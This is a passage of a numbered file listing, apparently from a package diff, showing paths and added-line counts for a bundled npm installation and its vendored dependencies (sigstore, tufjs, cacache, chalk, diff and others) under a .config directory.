  609. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@sigstore/protobuf-specs/dist/__generated__/sigstore_rekor.js +167 -0
  610. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@sigstore/protobuf-specs/dist/__generated__/sigstore_trustroot.js +103 -0
  611. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@sigstore/protobuf-specs/dist/__generated__/sigstore_verification.js +273 -0
  612. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@sigstore/protobuf-specs/dist/index.js +37 -0
  613. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@sigstore/protobuf-specs/package.json +31 -0
  614. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@sigstore/tuf/LICENSE +202 -0
  615. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@sigstore/tuf/dist/appdata.js +44 -0
  616. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@sigstore/tuf/dist/client.js +101 -0
  617. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@sigstore/tuf/dist/error.js +12 -0
  618. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@sigstore/tuf/dist/index.js +55 -0
  619. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@sigstore/tuf/dist/target.js +80 -0
  620. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@sigstore/tuf/package.json +41 -0
  621. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@sigstore/tuf/store/public-good-instance-root.json +1 -0
  622. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@tootallnate/once/LICENSE +21 -0
  623. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@tootallnate/once/dist/index.js +24 -0
  624. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@tootallnate/once/dist/overloaded-parameters.js +3 -0
  625. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@tootallnate/once/dist/types.js +3 -0
  626. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@tootallnate/once/package.json +52 -0
  627. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@tufjs/canonical-json/LICENSE +21 -0
  628. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@tufjs/canonical-json/lib/index.js +64 -0
  629. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@tufjs/canonical-json/package.json +39 -0
  630. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@tufjs/models/LICENSE +21 -0
  631. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@tufjs/models/dist/base.js +83 -0
  632. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@tufjs/models/dist/delegations.js +115 -0
  633. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@tufjs/models/dist/error.js +27 -0
  634. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@tufjs/models/dist/file.js +183 -0
  635. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@tufjs/models/dist/index.js +24 -0
  636. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@tufjs/models/dist/key.js +85 -0
  637. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@tufjs/models/dist/metadata.js +158 -0
  638. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@tufjs/models/dist/role.js +299 -0
  639. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@tufjs/models/dist/root.js +116 -0
  640. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@tufjs/models/dist/signature.js +38 -0
  641. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@tufjs/models/dist/snapshot.js +71 -0
  642. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@tufjs/models/dist/targets.js +92 -0
  643. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@tufjs/models/dist/timestamp.js +58 -0
  644. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@tufjs/models/dist/utils/guard.js +33 -0
  645. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@tufjs/models/dist/utils/index.js +28 -0
  646. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@tufjs/models/dist/utils/key.js +143 -0
  647. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@tufjs/models/dist/utils/oid.js +27 -0
  648. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@tufjs/models/dist/utils/types.js +2 -0
  649. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@tufjs/models/dist/utils/verify.js +13 -0
  650. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@tufjs/models/package.json +41 -0
  651. package/.config/npm/node_global/lib/node_modules/npm/node_modules/abbrev/LICENSE +46 -0
  652. package/.config/npm/node_global/lib/node_modules/npm/node_modules/abbrev/lib/index.js +50 -0
  653. package/.config/npm/node_global/lib/node_modules/npm/node_modules/abbrev/package.json +43 -0
  654. package/.config/npm/node_global/lib/node_modules/npm/node_modules/abort-controller/LICENSE +21 -0
  655. package/.config/npm/node_global/lib/node_modules/npm/node_modules/abort-controller/browser.js +13 -0
  656. package/.config/npm/node_global/lib/node_modules/npm/node_modules/abort-controller/browser.mjs +11 -0
  657. package/.config/npm/node_global/lib/node_modules/npm/node_modules/abort-controller/dist/abort-controller.js +127 -0
  658. package/.config/npm/node_global/lib/node_modules/npm/node_modules/abort-controller/dist/abort-controller.mjs +118 -0
  659. package/.config/npm/node_global/lib/node_modules/npm/node_modules/abort-controller/dist/abort-controller.umd.js +5 -0
  660. package/.config/npm/node_global/lib/node_modules/npm/node_modules/abort-controller/package.json +97 -0
  661. package/.config/npm/node_global/lib/node_modules/npm/node_modules/abort-controller/polyfill.js +21 -0
  662. package/.config/npm/node_global/lib/node_modules/npm/node_modules/abort-controller/polyfill.mjs +19 -0
  663. package/.config/npm/node_global/lib/node_modules/npm/node_modules/agent-base/dist/src/index.js +203 -0
  664. package/.config/npm/node_global/lib/node_modules/npm/node_modules/agent-base/dist/src/promisify.js +18 -0
  665. package/.config/npm/node_global/lib/node_modules/npm/node_modules/agent-base/package.json +64 -0
  666. package/.config/npm/node_global/lib/node_modules/npm/node_modules/agentkeepalive/LICENSE +23 -0
  667. package/.config/npm/node_global/lib/node_modules/npm/node_modules/agentkeepalive/browser.js +5 -0
  668. package/.config/npm/node_global/lib/node_modules/npm/node_modules/agentkeepalive/index.js +5 -0
  669. package/.config/npm/node_global/lib/node_modules/npm/node_modules/agentkeepalive/lib/agent.js +398 -0
  670. package/.config/npm/node_global/lib/node_modules/npm/node_modules/agentkeepalive/lib/constants.js +14 -0
  671. package/.config/npm/node_global/lib/node_modules/npm/node_modules/agentkeepalive/lib/https_agent.js +51 -0
  672. package/.config/npm/node_global/lib/node_modules/npm/node_modules/agentkeepalive/package.json +58 -0
  673. package/.config/npm/node_global/lib/node_modules/npm/node_modules/aggregate-error/index.js +47 -0
  674. package/.config/npm/node_global/lib/node_modules/npm/node_modules/aggregate-error/license +9 -0
  675. package/.config/npm/node_global/lib/node_modules/npm/node_modules/aggregate-error/package.json +41 -0
  676. package/.config/npm/node_global/lib/node_modules/npm/node_modules/ansi-regex/index.js +10 -0
  677. package/.config/npm/node_global/lib/node_modules/npm/node_modules/ansi-regex/license +9 -0
  678. package/.config/npm/node_global/lib/node_modules/npm/node_modules/ansi-regex/package.json +55 -0
  679. package/.config/npm/node_global/lib/node_modules/npm/node_modules/ansi-styles/index.js +163 -0
  680. package/.config/npm/node_global/lib/node_modules/npm/node_modules/ansi-styles/license +9 -0
  681. package/.config/npm/node_global/lib/node_modules/npm/node_modules/ansi-styles/package.json +56 -0
  682. package/.config/npm/node_global/lib/node_modules/npm/node_modules/aproba/LICENSE +14 -0
  683. package/.config/npm/node_global/lib/node_modules/npm/node_modules/aproba/index.js +105 -0
  684. package/.config/npm/node_global/lib/node_modules/npm/node_modules/aproba/package.json +35 -0
  685. package/.config/npm/node_global/lib/node_modules/npm/node_modules/archy/LICENSE +18 -0
  686. package/.config/npm/node_global/lib/node_modules/npm/node_modules/archy/examples/beep.js +24 -0
  687. package/.config/npm/node_global/lib/node_modules/npm/node_modules/archy/examples/multi_line.js +25 -0
  688. package/.config/npm/node_global/lib/node_modules/npm/node_modules/archy/index.js +35 -0
  689. package/.config/npm/node_global/lib/node_modules/npm/node_modules/archy/package.json +40 -0
  690. package/.config/npm/node_global/lib/node_modules/npm/node_modules/archy/test/beep.js +40 -0
  691. package/.config/npm/node_global/lib/node_modules/npm/node_modules/archy/test/multi_line.js +45 -0
  692. package/.config/npm/node_global/lib/node_modules/npm/node_modules/archy/test/non_unicode.js +40 -0
  693. package/.config/npm/node_global/lib/node_modules/npm/node_modules/are-we-there-yet/LICENSE.md +18 -0
  694. package/.config/npm/node_global/lib/node_modules/npm/node_modules/are-we-there-yet/lib/index.js +4 -0
  695. package/.config/npm/node_global/lib/node_modules/npm/node_modules/are-we-there-yet/lib/tracker-base.js +11 -0
  696. package/.config/npm/node_global/lib/node_modules/npm/node_modules/are-we-there-yet/lib/tracker-group.js +116 -0
  697. package/.config/npm/node_global/lib/node_modules/npm/node_modules/are-we-there-yet/lib/tracker-stream.js +36 -0
  698. package/.config/npm/node_global/lib/node_modules/npm/node_modules/are-we-there-yet/lib/tracker.js +32 -0
  699. package/.config/npm/node_global/lib/node_modules/npm/node_modules/are-we-there-yet/package.json +56 -0
  700. package/.config/npm/node_global/lib/node_modules/npm/node_modules/balanced-match/LICENSE.md +21 -0
  701. package/.config/npm/node_global/lib/node_modules/npm/node_modules/balanced-match/index.js +62 -0
  702. package/.config/npm/node_global/lib/node_modules/npm/node_modules/balanced-match/package.json +48 -0
  703. package/.config/npm/node_global/lib/node_modules/npm/node_modules/base64-js/LICENSE +21 -0
  704. package/.config/npm/node_global/lib/node_modules/npm/node_modules/base64-js/base64js.min.js +1 -0
  705. package/.config/npm/node_global/lib/node_modules/npm/node_modules/base64-js/index.js +150 -0
  706. package/.config/npm/node_global/lib/node_modules/npm/node_modules/base64-js/package.json +47 -0
  707. package/.config/npm/node_global/lib/node_modules/npm/node_modules/bin-links/LICENSE +15 -0
  708. package/.config/npm/node_global/lib/node_modules/npm/node_modules/bin-links/lib/bin-target.js +9 -0
  709. package/.config/npm/node_global/lib/node_modules/npm/node_modules/bin-links/lib/check-bin.js +74 -0
  710. package/.config/npm/node_global/lib/node_modules/npm/node_modules/bin-links/lib/check-bins.js +18 -0
  711. package/.config/npm/node_global/lib/node_modules/npm/node_modules/bin-links/lib/fix-bin.js +42 -0
  712. package/.config/npm/node_global/lib/node_modules/npm/node_modules/bin-links/lib/get-node-modules.js +19 -0
  713. package/.config/npm/node_global/lib/node_modules/npm/node_modules/bin-links/lib/get-paths.js +42 -0
  714. package/.config/npm/node_global/lib/node_modules/npm/node_modules/bin-links/lib/get-prefix.js +3 -0
  715. package/.config/npm/node_global/lib/node_modules/npm/node_modules/bin-links/lib/index.js +44 -0
  716. package/.config/npm/node_global/lib/node_modules/npm/node_modules/bin-links/lib/is-windows.js +2 -0
  717. package/.config/npm/node_global/lib/node_modules/npm/node_modules/bin-links/lib/link-bin.js +9 -0
  718. package/.config/npm/node_global/lib/node_modules/npm/node_modules/bin-links/lib/link-bins.js +23 -0
  719. package/.config/npm/node_global/lib/node_modules/npm/node_modules/bin-links/lib/link-gently.js +90 -0
  720. package/.config/npm/node_global/lib/node_modules/npm/node_modules/bin-links/lib/link-mans.js +52 -0
  721. package/.config/npm/node_global/lib/node_modules/npm/node_modules/bin-links/lib/man-target.js +6 -0
  722. package/.config/npm/node_global/lib/node_modules/npm/node_modules/bin-links/lib/shim-bin.js +86 -0
  723. package/.config/npm/node_global/lib/node_modules/npm/node_modules/bin-links/package.json +58 -0
  724. package/.config/npm/node_global/lib/node_modules/npm/node_modules/binary-extensions/binary-extensions.json +260 -0
  725. package/.config/npm/node_global/lib/node_modules/npm/node_modules/binary-extensions/index.js +1 -0
  726. package/.config/npm/node_global/lib/node_modules/npm/node_modules/binary-extensions/license +9 -0
  727. package/.config/npm/node_global/lib/node_modules/npm/node_modules/binary-extensions/package.json +38 -0
  728. package/.config/npm/node_global/lib/node_modules/npm/node_modules/brace-expansion/LICENSE +21 -0
  729. package/.config/npm/node_global/lib/node_modules/npm/node_modules/brace-expansion/index.js +203 -0
  730. package/.config/npm/node_global/lib/node_modules/npm/node_modules/brace-expansion/package.json +46 -0
  731. package/.config/npm/node_global/lib/node_modules/npm/node_modules/buffer/AUTHORS.md +73 -0
  732. package/.config/npm/node_global/lib/node_modules/npm/node_modules/buffer/LICENSE +21 -0
  733. package/.config/npm/node_global/lib/node_modules/npm/node_modules/buffer/index.js +2106 -0
  734. package/.config/npm/node_global/lib/node_modules/npm/node_modules/buffer/package.json +93 -0
  735. package/.config/npm/node_global/lib/node_modules/npm/node_modules/builtins/License +20 -0
  736. package/.config/npm/node_global/lib/node_modules/npm/node_modules/builtins/index.js +80 -0
  737. package/.config/npm/node_global/lib/node_modules/npm/node_modules/builtins/package.json +20 -0
  738. package/.config/npm/node_global/lib/node_modules/npm/node_modules/cacache/LICENSE.md +16 -0
  739. package/.config/npm/node_global/lib/node_modules/npm/node_modules/cacache/lib/content/path.js +29 -0
  740. package/.config/npm/node_global/lib/node_modules/npm/node_modules/cacache/lib/content/read.js +166 -0
  741. package/.config/npm/node_global/lib/node_modules/npm/node_modules/cacache/lib/content/rm.js +18 -0
  742. package/.config/npm/node_global/lib/node_modules/npm/node_modules/cacache/lib/content/write.js +205 -0
  743. package/.config/npm/node_global/lib/node_modules/npm/node_modules/cacache/lib/entry-index.js +330 -0
  744. package/.config/npm/node_global/lib/node_modules/npm/node_modules/cacache/lib/get.js +170 -0
  745. package/.config/npm/node_global/lib/node_modules/npm/node_modules/cacache/lib/index.js +42 -0
  746. package/.config/npm/node_global/lib/node_modules/npm/node_modules/cacache/lib/memoization.js +72 -0
  747. package/.config/npm/node_global/lib/node_modules/npm/node_modules/cacache/lib/put.js +80 -0
  748. package/.config/npm/node_global/lib/node_modules/npm/node_modules/cacache/lib/rm.js +31 -0
  749. package/.config/npm/node_global/lib/node_modules/npm/node_modules/cacache/lib/util/glob.js +7 -0
  750. package/.config/npm/node_global/lib/node_modules/npm/node_modules/cacache/lib/util/hash-to-segments.js +7 -0
  751. package/.config/npm/node_global/lib/node_modules/npm/node_modules/cacache/lib/util/tmp.js +26 -0
  752. package/.config/npm/node_global/lib/node_modules/npm/node_modules/cacache/lib/verify.js +257 -0
  753. package/.config/npm/node_global/lib/node_modules/npm/node_modules/cacache/package.json +82 -0
  754. package/.config/npm/node_global/lib/node_modules/npm/node_modules/chalk/license +9 -0
  755. package/.config/npm/node_global/lib/node_modules/npm/node_modules/chalk/package.json +81 -0
  756. package/.config/npm/node_global/lib/node_modules/npm/node_modules/chalk/source/index.js +225 -0
  757. package/.config/npm/node_global/lib/node_modules/npm/node_modules/chalk/source/utilities.js +33 -0
  758. package/.config/npm/node_global/lib/node_modules/npm/node_modules/chalk/source/vendor/ansi-styles/index.js +223 -0
  759. package/.config/npm/node_global/lib/node_modules/npm/node_modules/chalk/source/vendor/supports-color/browser.js +30 -0
  760. package/.config/npm/node_global/lib/node_modules/npm/node_modules/chalk/source/vendor/supports-color/index.js +181 -0
  761. package/.config/npm/node_global/lib/node_modules/npm/node_modules/chownr/LICENSE +15 -0
  762. package/.config/npm/node_global/lib/node_modules/npm/node_modules/chownr/chownr.js +167 -0
  763. package/.config/npm/node_global/lib/node_modules/npm/node_modules/chownr/package.json +32 -0
  764. package/.config/npm/node_global/lib/node_modules/npm/node_modules/ci-info/LICENSE +21 -0
  765. package/.config/npm/node_global/lib/node_modules/npm/node_modules/ci-info/index.js +90 -0
  766. package/.config/npm/node_global/lib/node_modules/npm/node_modules/ci-info/package.json +45 -0
  767. package/.config/npm/node_global/lib/node_modules/npm/node_modules/ci-info/vendors.json +318 -0
  768. package/.config/npm/node_global/lib/node_modules/npm/node_modules/cidr-regex/LICENSE +22 -0
  769. package/.config/npm/node_global/lib/node_modules/npm/node_modules/cidr-regex/index.js +18 -0
  770. package/.config/npm/node_global/lib/node_modules/npm/node_modules/cidr-regex/package.json +42 -0
  771. package/.config/npm/node_global/lib/node_modules/npm/node_modules/clean-stack/index.js +40 -0
  772. package/.config/npm/node_global/lib/node_modules/npm/node_modules/clean-stack/license +9 -0
  773. package/.config/npm/node_global/lib/node_modules/npm/node_modules/clean-stack/package.json +39 -0
  774. package/.config/npm/node_global/lib/node_modules/npm/node_modules/cli-columns/color.js +16 -0
  775. package/.config/npm/node_global/lib/node_modules/npm/node_modules/cli-columns/index.js +82 -0
  776. package/.config/npm/node_global/lib/node_modules/npm/node_modules/cli-columns/license +20 -0
  777. package/.config/npm/node_global/lib/node_modules/npm/node_modules/cli-columns/package.json +54 -0
  778. package/.config/npm/node_global/lib/node_modules/npm/node_modules/cli-columns/test.js +101 -0
  779. package/.config/npm/node_global/lib/node_modules/npm/node_modules/cli-table3/LICENSE +21 -0
  780. package/.config/npm/node_global/lib/node_modules/npm/node_modules/cli-table3/index.js +1 -0
  781. package/.config/npm/node_global/lib/node_modules/npm/node_modules/cli-table3/package.json +100 -0
  782. package/.config/npm/node_global/lib/node_modules/npm/node_modules/cli-table3/src/cell.js +409 -0
  783. package/.config/npm/node_global/lib/node_modules/npm/node_modules/cli-table3/src/debug.js +28 -0
  784. package/.config/npm/node_global/lib/node_modules/npm/node_modules/cli-table3/src/layout-manager.js +254 -0
  785. package/.config/npm/node_global/lib/node_modules/npm/node_modules/cli-table3/src/table.js +106 -0
  786. package/.config/npm/node_global/lib/node_modules/npm/node_modules/cli-table3/src/utils.js +336 -0
  787. package/.config/npm/node_global/lib/node_modules/npm/node_modules/clone/LICENSE +18 -0
  788. package/.config/npm/node_global/lib/node_modules/npm/node_modules/clone/clone.iml +10 -0
  789. package/.config/npm/node_global/lib/node_modules/npm/node_modules/clone/clone.js +166 -0
  790. package/.config/npm/node_global/lib/node_modules/npm/node_modules/clone/package.json +51 -0
  791. package/.config/npm/node_global/lib/node_modules/npm/node_modules/cmd-shim/LICENSE +15 -0
  792. package/.config/npm/node_global/lib/node_modules/npm/node_modules/cmd-shim/lib/index.js +239 -0
  793. package/.config/npm/node_global/lib/node_modules/npm/node_modules/cmd-shim/lib/to-batch-syntax.js +49 -0
  794. package/.config/npm/node_global/lib/node_modules/npm/node_modules/cmd-shim/package.json +46 -0
  795. package/.config/npm/node_global/lib/node_modules/npm/node_modules/color-convert/LICENSE +21 -0
  796. package/.config/npm/node_global/lib/node_modules/npm/node_modules/color-convert/conversions.js +839 -0
  797. package/.config/npm/node_global/lib/node_modules/npm/node_modules/color-convert/index.js +81 -0
  798. package/.config/npm/node_global/lib/node_modules/npm/node_modules/color-convert/package.json +48 -0
  799. package/.config/npm/node_global/lib/node_modules/npm/node_modules/color-convert/route.js +97 -0
  800. package/.config/npm/node_global/lib/node_modules/npm/node_modules/color-name/LICENSE +8 -0
  801. package/.config/npm/node_global/lib/node_modules/npm/node_modules/color-name/index.js +152 -0
  802. package/.config/npm/node_global/lib/node_modules/npm/node_modules/color-name/package.json +28 -0
  803. package/.config/npm/node_global/lib/node_modules/npm/node_modules/color-support/LICENSE +15 -0
  804. package/.config/npm/node_global/lib/node_modules/npm/node_modules/color-support/README.md +129 -0
  805. package/.config/npm/node_global/lib/node_modules/npm/node_modules/color-support/bin.js +3 -0
  806. package/.config/npm/node_global/lib/node_modules/npm/node_modules/color-support/browser.js +14 -0
  807. package/.config/npm/node_global/lib/node_modules/npm/node_modules/color-support/index.js +134 -0
  808. package/.config/npm/node_global/lib/node_modules/npm/node_modules/color-support/package.json +36 -0
  809. package/.config/npm/node_global/lib/node_modules/npm/node_modules/columnify/LICENSE +21 -0
  810. package/.config/npm/node_global/lib/node_modules/npm/node_modules/columnify/Makefile +9 -0
  811. package/.config/npm/node_global/lib/node_modules/npm/node_modules/columnify/columnify.js +306 -0
  812. package/.config/npm/node_global/lib/node_modules/npm/node_modules/columnify/index.js +297 -0
  813. package/.config/npm/node_global/lib/node_modules/npm/node_modules/columnify/package.json +53 -0
  814. package/.config/npm/node_global/lib/node_modules/npm/node_modules/columnify/utils.js +193 -0
  815. package/.config/npm/node_global/lib/node_modules/npm/node_modules/columnify/width.js +6 -0
  816. package/.config/npm/node_global/lib/node_modules/npm/node_modules/common-ancestor-path/LICENSE +15 -0
  817. package/.config/npm/node_global/lib/node_modules/npm/node_modules/common-ancestor-path/index.js +17 -0
  818. package/.config/npm/node_global/lib/node_modules/npm/node_modules/common-ancestor-path/package.json +28 -0
  819. package/.config/npm/node_global/lib/node_modules/npm/node_modules/concat-map/LICENSE +18 -0
  820. package/.config/npm/node_global/lib/node_modules/npm/node_modules/concat-map/example/map.js +6 -0
  821. package/.config/npm/node_global/lib/node_modules/npm/node_modules/concat-map/index.js +13 -0
  822. package/.config/npm/node_global/lib/node_modules/npm/node_modules/concat-map/package.json +43 -0
  823. package/.config/npm/node_global/lib/node_modules/npm/node_modules/concat-map/test/map.js +39 -0
  824. package/.config/npm/node_global/lib/node_modules/npm/node_modules/console-control-strings/LICENSE +13 -0
  825. package/.config/npm/node_global/lib/node_modules/npm/node_modules/console-control-strings/index.js +125 -0
  826. package/.config/npm/node_global/lib/node_modules/npm/node_modules/console-control-strings/package.json +27 -0
  827. package/.config/npm/node_global/lib/node_modules/npm/node_modules/cross-spawn/LICENSE +21 -0
  828. package/.config/npm/node_global/lib/node_modules/npm/node_modules/cross-spawn/index.js +39 -0
  829. package/.config/npm/node_global/lib/node_modules/npm/node_modules/cross-spawn/lib/enoent.js +59 -0
  830. package/.config/npm/node_global/lib/node_modules/npm/node_modules/cross-spawn/lib/parse.js +91 -0
  831. package/.config/npm/node_global/lib/node_modules/npm/node_modules/cross-spawn/lib/util/escape.js +45 -0
  832. package/.config/npm/node_global/lib/node_modules/npm/node_modules/cross-spawn/lib/util/readShebang.js +23 -0
  833. package/.config/npm/node_global/lib/node_modules/npm/node_modules/cross-spawn/lib/util/resolveCommand.js +52 -0
  834. package/.config/npm/node_global/lib/node_modules/npm/node_modules/cross-spawn/node_modules/which/LICENSE +15 -0
  835. package/.config/npm/node_global/lib/node_modules/npm/node_modules/cross-spawn/node_modules/which/README.md +54 -0
  836. package/.config/npm/node_global/lib/node_modules/npm/node_modules/cross-spawn/node_modules/which/bin/node-which +52 -0
  837. package/.config/npm/node_global/lib/node_modules/npm/node_modules/cross-spawn/node_modules/which/package.json +43 -0
  838. package/.config/npm/node_global/lib/node_modules/npm/node_modules/cross-spawn/node_modules/which/which.js +125 -0
  839. package/.config/npm/node_global/lib/node_modules/npm/node_modules/cross-spawn/package.json +73 -0
  840. package/.config/npm/node_global/lib/node_modules/npm/node_modules/cssesc/LICENSE-MIT.txt +20 -0
  841. package/.config/npm/node_global/lib/node_modules/npm/node_modules/cssesc/README.md +201 -0
  842. package/.config/npm/node_global/lib/node_modules/npm/node_modules/cssesc/bin/cssesc +116 -0
  843. package/.config/npm/node_global/lib/node_modules/npm/node_modules/cssesc/cssesc.js +110 -0
  844. package/.config/npm/node_global/lib/node_modules/npm/node_modules/cssesc/man/cssesc.1 +70 -0
  845. package/.config/npm/node_global/lib/node_modules/npm/node_modules/cssesc/package.json +51 -0
  846. package/.config/npm/node_global/lib/node_modules/npm/node_modules/debug/LICENSE +20 -0
  847. package/.config/npm/node_global/lib/node_modules/npm/node_modules/debug/node_modules/ms/index.js +162 -0
  848. package/.config/npm/node_global/lib/node_modules/npm/node_modules/debug/node_modules/ms/license.md +21 -0
  849. package/.config/npm/node_global/lib/node_modules/npm/node_modules/debug/node_modules/ms/package.json +37 -0
  850. package/.config/npm/node_global/lib/node_modules/npm/node_modules/debug/package.json +59 -0
  851. package/.config/npm/node_global/lib/node_modules/npm/node_modules/debug/src/browser.js +269 -0
  852. package/.config/npm/node_global/lib/node_modules/npm/node_modules/debug/src/common.js +274 -0
  853. package/.config/npm/node_global/lib/node_modules/npm/node_modules/debug/src/index.js +10 -0
  854. package/.config/npm/node_global/lib/node_modules/npm/node_modules/debug/src/node.js +263 -0
  855. package/.config/npm/node_global/lib/node_modules/npm/node_modules/defaults/LICENSE +22 -0
  856. package/.config/npm/node_global/lib/node_modules/npm/node_modules/defaults/index.js +13 -0
  857. package/.config/npm/node_global/lib/node_modules/npm/node_modules/defaults/package.json +33 -0
  858. package/.config/npm/node_global/lib/node_modules/npm/node_modules/defaults/test.js +34 -0
  859. package/.config/npm/node_global/lib/node_modules/npm/node_modules/delegates/History.md +22 -0
  860. package/.config/npm/node_global/lib/node_modules/npm/node_modules/delegates/License +20 -0
  861. package/.config/npm/node_global/lib/node_modules/npm/node_modules/delegates/Makefile +8 -0
  862. package/.config/npm/node_global/lib/node_modules/npm/node_modules/delegates/index.js +121 -0
  863. package/.config/npm/node_global/lib/node_modules/npm/node_modules/delegates/package.json +13 -0
  864. package/.config/npm/node_global/lib/node_modules/npm/node_modules/delegates/test/index.js +94 -0
  865. package/.config/npm/node_global/lib/node_modules/npm/node_modules/depd/History.md +103 -0
  866. package/.config/npm/node_global/lib/node_modules/npm/node_modules/depd/LICENSE +22 -0
  867. package/.config/npm/node_global/lib/node_modules/npm/node_modules/depd/index.js +538 -0
  868. package/.config/npm/node_global/lib/node_modules/npm/node_modules/depd/lib/browser/index.js +77 -0
  869. package/.config/npm/node_global/lib/node_modules/npm/node_modules/depd/package.json +45 -0
  870. package/.config/npm/node_global/lib/node_modules/npm/node_modules/diff/CONTRIBUTING.md +39 -0
  871. package/.config/npm/node_global/lib/node_modules/npm/node_modules/diff/LICENSE +31 -0
  872. package/.config/npm/node_global/lib/node_modules/npm/node_modules/diff/dist/diff.js +1627 -0
  873. package/.config/npm/node_global/lib/node_modules/npm/node_modules/diff/dist/diff.min.js +38 -0
  874. package/.config/npm/node_global/lib/node_modules/npm/node_modules/diff/lib/convert/dmp.js +32 -0
  875. package/.config/npm/node_global/lib/node_modules/npm/node_modules/diff/lib/convert/xml.js +42 -0
  876. package/.config/npm/node_global/lib/node_modules/npm/node_modules/diff/lib/diff/array.js +45 -0
  877. package/.config/npm/node_global/lib/node_modules/npm/node_modules/diff/lib/diff/base.js +307 -0
  878. package/.config/npm/node_global/lib/node_modules/npm/node_modules/diff/lib/diff/character.js +37 -0
  879. package/.config/npm/node_global/lib/node_modules/npm/node_modules/diff/lib/diff/css.js +41 -0
  880. package/.config/npm/node_global/lib/node_modules/npm/node_modules/diff/lib/diff/json.js +163 -0
  881. package/.config/npm/node_global/lib/node_modules/npm/node_modules/diff/lib/diff/line.js +89 -0
  882. package/.config/npm/node_global/lib/node_modules/npm/node_modules/diff/lib/diff/sentence.js +41 -0
  883. package/.config/npm/node_global/lib/node_modules/npm/node_modules/diff/lib/diff/word.js +108 -0
  884. package/.config/npm/node_global/lib/node_modules/npm/node_modules/diff/lib/index.es6.js +1561 -0
  885. package/.config/npm/node_global/lib/node_modules/npm/node_modules/diff/lib/index.js +216 -0
  886. package/.config/npm/node_global/lib/node_modules/npm/node_modules/diff/lib/index.mjs +1561 -0
  887. package/.config/npm/node_global/lib/node_modules/npm/node_modules/diff/lib/patch/apply.js +238 -0
  888. package/.config/npm/node_global/lib/node_modules/npm/node_modules/diff/lib/patch/create.js +272 -0
  889. package/.config/npm/node_global/lib/node_modules/npm/node_modules/diff/lib/patch/merge.js +613 -0
  890. package/.config/npm/node_global/lib/node_modules/npm/node_modules/diff/lib/patch/parse.js +167 -0
  891. package/.config/npm/node_global/lib/node_modules/npm/node_modules/diff/lib/util/array.js +32 -0
  892. package/.config/npm/node_global/lib/node_modules/npm/node_modules/diff/lib/util/distance-iterator.js +57 -0
  893. package/.config/npm/node_global/lib/node_modules/npm/node_modules/diff/lib/util/params.js +24 -0
  894. package/.config/npm/node_global/lib/node_modules/npm/node_modules/diff/package.json +87 -0
  895. package/.config/npm/node_global/lib/node_modules/npm/node_modules/diff/release-notes.md +309 -0
  896. package/.config/npm/node_global/lib/node_modules/npm/node_modules/diff/runtime.js +3 -0
  897. package/.config/npm/node_global/lib/node_modules/npm/node_modules/eastasianwidth/eastasianwidth.js +311 -0
  898. package/.config/npm/node_global/lib/node_modules/npm/node_modules/eastasianwidth/package.json +18 -0
  899. package/.config/npm/node_global/lib/node_modules/npm/node_modules/emoji-regex/LICENSE-MIT.txt +20 -0
  900. package/.config/npm/node_global/lib/node_modules/npm/node_modules/emoji-regex/es2015/index.js +6 -0
  901. package/.config/npm/node_global/lib/node_modules/npm/node_modules/emoji-regex/es2015/text.js +6 -0
  902. package/.config/npm/node_global/lib/node_modules/npm/node_modules/emoji-regex/index.js +6 -0
  903. package/.config/npm/node_global/lib/node_modules/npm/node_modules/emoji-regex/package.json +50 -0
  904. package/.config/npm/node_global/lib/node_modules/npm/node_modules/emoji-regex/text.js +6 -0
  905. package/.config/npm/node_global/lib/node_modules/npm/node_modules/encoding/LICENSE +16 -0
  906. package/.config/npm/node_global/lib/node_modules/npm/node_modules/encoding/lib/encoding.js +83 -0
  907. package/.config/npm/node_global/lib/node_modules/npm/node_modules/encoding/package.json +18 -0
  908. package/.config/npm/node_global/lib/node_modules/npm/node_modules/encoding/test/test.js +49 -0
  909. package/.config/npm/node_global/lib/node_modules/npm/node_modules/env-paths/index.js +74 -0
  910. package/.config/npm/node_global/lib/node_modules/npm/node_modules/env-paths/license +9 -0
  911. package/.config/npm/node_global/lib/node_modules/npm/node_modules/env-paths/package.json +45 -0
  912. package/.config/npm/node_global/lib/node_modules/npm/node_modules/err-code/bower.json +30 -0
  913. package/.config/npm/node_global/lib/node_modules/npm/node_modules/err-code/index.js +47 -0
  914. package/.config/npm/node_global/lib/node_modules/npm/node_modules/err-code/index.umd.js +51 -0
  915. package/.config/npm/node_global/lib/node_modules/npm/node_modules/err-code/package.json +34 -0
